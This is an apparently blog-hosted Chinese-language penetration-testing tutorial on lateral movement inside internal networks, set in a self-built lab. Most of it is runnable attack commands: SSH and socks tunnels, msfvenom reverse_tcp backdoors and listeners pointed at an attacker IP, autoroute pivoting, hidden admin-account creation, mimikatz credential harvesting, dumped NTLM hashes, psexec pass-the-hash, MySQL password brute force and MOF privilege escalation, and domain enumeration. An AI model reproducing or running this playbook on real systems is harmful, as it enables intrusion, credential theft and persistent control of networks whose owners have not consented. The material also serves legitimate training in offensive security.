内网
内网渗透篇
一、隧道技术-SSH
正向链接实现
web 服务器执行ssh –CNfL 0.0.0.0:7777:10.10.10.129:80 moon@192.168.0.144
将10.10.10.128:80端口映射到0.0.0.0:7777,然后浏览器访问192.168.0.144:7777就能够访问内网的10.10.10.129:80
反向链接实现
ssh -qTfnN -R port:host:hostport remote_ip
这是标准的匹配的模式
下面进行秀操作
ssh –qTfnN –R 2222:127.0.0.1:22 root@192.168.0.115
ssh –p 2222 web@127.0.0.1
将127.0.0.1:22端口转发到192.168.0.115
然后第二条命令是在攻击机上面执行,进行登陆。
sockets代理
SSH -qTfnN -D port remotehost
然后设置代理(被攻击的服务器的ip+端口)
二、端口转发
生成metasploit的后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.196 lport=12345 -f exe >/var/www/html/ss.exe
设置kali的监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.224
set lport 12345
exploit
映射端口
portfwd add -L 192.168.43.224 -l 2020 -p 80 -r 10.10.10.128
这是将10.10.10.128映射到192.168.43.224:2020
转发端口
portfwd add -l 5555 -p 3389 -r 192.168.0.149
rdesktop 127.1.1.0: 5555
查看列表
portfwd list
清空列表
portfwd flush
三、Socket隧道
编译SSOCKS程序
./configure
make
cd src
./rcsocks -l 1088 -p 1080 -vv这样就可以直接使用了
这样kali上的链接就已经搭建好了。
/rssocks -vv -s 192.168.10.50:1080 这个是在web服务器上执行
使用proxychains
/etc/proxychains.conf
用kali 里面的nmap扫描 10.10.10.128
proxychains nmap –Pn -sT 10.10.10.128
进行内网扫描UDP的数据是扫描不出来的
扫描内网的机器
nmap -Pn -sT 10.10.10.0/24
四、跨路由扫描
生成metasploit后门windows
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.196 lport=12345 -f exe >/var/www/html/s.exe
kali监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.196
set lport 12345
exploit
然后进行基本信息的获取
查看当前用户
getuid
获取网卡信息
ifconfig
路由信息
run get_local_subnets
下面继续使用kaili进行操作
增加路由
run autoroute -s 10.10.10.0/24
run autoroute –p查看是否增加了路由
background
搭建socks链接服务
use auxiliary/server/socks4a
show options
set SRVPORT 10044随便设置,然后挂上sock隧道就可以了
run
/etc/prxoychains.conf
五、常见的内网测试
大概信息如下:
kali 192.168.43.224
2003 192.168.43.115 192.168.111.132
ubuntu 192.168.111.128
首先生成攻击载荷
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.224 lport=12345 -f exe >/var/www/html/s.exe(kali)
本地监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.224
set lport 12345
exploit
注意这些lhost和lport要和攻击载荷中的一致
开始操作
route 查看路由表 网关等信息均能查看
ps 查看进程
现在将metasploit注入到其他的进程里面,保证每次都能进入
getprivs 尽可能提升权限
getsystem 获得系统权限
shell 进入cmd中
net user moon$ moon123 /add & net localground administrators moon$ /add增加用户
run post/multi/gather/ping_sweep RHOSTS=10.10.10.0/24 检测存活ip
socket代理 用namp扫描内网的ip服务,首先增加一个路由
run autoroute 增加一个路由
use auxiliary/server/socks4a 选择这个
set SRVHOST 192.168.43.224 socke 隧道
exploit
设置proxychains代理 来进行扫描端口,这里就相当于在用目标机器进行nmap扫描内网了。
socks4 192.168.43.224 1080 1080这是默认端口
proxychains nmap -sT -Pn -p 445,22,80,3306 192.168.111.128-132 --open -oN 192.168.111.txt
扫描445 22 80 3306 的ip段为128-132,如果有就保存到后面的文件中 比较耗时间 这个扫描比较简单
现在换成之前的msf
获取当前服务器的hash
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1006:b6cdaa6dd10a6155b54d6886c7b4b8f4:570c90ed6cca2f86b06241a2e5e0c3df:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WWW-C4D593E2D2C:1000:44566b28c2e9a8f2d6aba8863bf7093c:2d8b5c5e471954a4ff306dff1b311cc6:::
IWAM_WWW-C4D593E2D2C:1001:80e1bd999815342156825c6c4818ef78:7c7ee5557864c448aba74604255eeac2:::
MYSQL_ZKEYS:1007:967b40abb061261ca53c143f4b0a15b4:9cd4bf9a7d90202f70773dd421c304a9:::
PhpMyAdmin_ZKEYS:1008:152a9049175e2f6a9afa378be4aedf15:184d679e2df3b67dd7ae1c2a854495a3:::
SUPPORT_388945a0:1004:aad3b435b51404eeaad3b435b51404ee:eb84cedb36588cbaf2bf1b9a64905ce5:::
445端口打开,开启hash攻击
use exploit/windows/smb/psexec -->使用这个渗透攻击模块
set payload windows/meterpreter/bind_tcp
show options -->查看配置选项
set RHOST 192.168.111.132 -->设置攻击目标192.168.2.107,端口默认445
set SMBUser Administrator -->设置账号为wing
set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
exploit -->执行攻击
然后来一个hash在先加解密:http://www.objectif-securite.ch/ophcrack.php其中密码是后面的那一窜数字。
然后我们就得到了一个新的session
下面进行密码收集
load mimikatz 这是一个插件
msv 收集密码
kerberos 查看是不是有明文密码
run getgui -e 开启他的远程链接
增加用户run getgui -u moonsec -p moonsec
proxychains rdesktop -u Administrator -p 123456 192.168.111.132
六、域的搭建
参考链接:https://jingyan.baidu.com/article/19192ad8e1593ae53e5707be.html
域控2008:jsp,adminstrator xxx123456.. 10.10.1.2
域的客户机2008:靶机 xxx333.. 10.10.1.4 192.168.43.225
域的客户机2003 xxx222.. 10.10.1.3
dcpromo.exe
配置域,创建用户
七、一次完整的域渗透
首先打通后门,进入他,然后提升一下权限。
域的简介:https://baike.baidu.com/item/windows域/1492318
查看一下网络 net view
进入shell 查看一下网络DNS等服务信息
run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24
DNS一般和主域是搭建在一起的
被控制的靶机的路由
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.43.183 10 13
10.10.1.0 255.255.255.0 10.10.1.4 266 11
10.10.1.4 255.255.255.255 10.10.1.4 266 11
10.10.1.255 255.255.255.255 10.10.1.4 266 11
127.0.0.0 255.0.0.0 127.0.0.1 306 1
127.0.0.1 255.255.255.255 127.0.0.1 306 1
127.255.255.255 255.255.255.255 127.0.0.1 306 1
192.168.43.0 255.255.255.0 192.168.43.225 266 13
192.168.43.225 255.255.255.255 192.168.43.225 266 13
192.168.43.255 255.255.255.255 192.168.43.225 266 13
224.0.0.0 240.0.0.0 127.0.0.1 306 1
224.0.0.0 240.0.0.0 10.10.1.4 266 11
224.0.0.0 240.0.0.0 192.168.43.225 266 13
255.255.255.255 255.255.255.255 127.0.0.1 306 1
255.255.255.255 255.255.255.255 10.10.1.4 266 11
255.255.255.255 255.255.255.255 192.168.43.225 266 13
操作继续
在background中进行route add 10.10.1.4 255.255.255.0 1
扫描端口的插件
use scanner/portscan/tcp
set RHOSTA 10.10.1.3
扫描得到mysql服务,然后就是搞死他
use scanner/mysql/mysql_login
set PASS_FILE /etc/passwd.txt
set USERNAME root
然后通过mysql来提权
use windows/mysql/mysql_mof
set PASSWORD 123456
set rhost 10.10.1.3
set USERNAME root
set payload windows/meterpreter/bind_tcp
exploit
继续提权
use post/multi/recon/local_exploit_suggester
下一步拿到system权限后继续跑
view /domain:moonsec 查看当前域的计算机
通过ping获得客户机的ip地址
net user /domain 查看当前域的所有用户
net group /domain 获得当前域的用户组
net group "domain admins" /domain 获得管理员的名字
因为普通域用户更改系统信息都需要通过域管理员的验证
获取明文密码,拿到3389端口,获取sessions大法。
use exploit/windows/smb/psexec
set RHOST 10.10.1.2
set SMBUser administrator
set SMBPass xxx123456..
set payload windows/meterpreter/bind_tcp
获取hash : run post/windows/gather/hashdump
浙公网安备 33010602011771号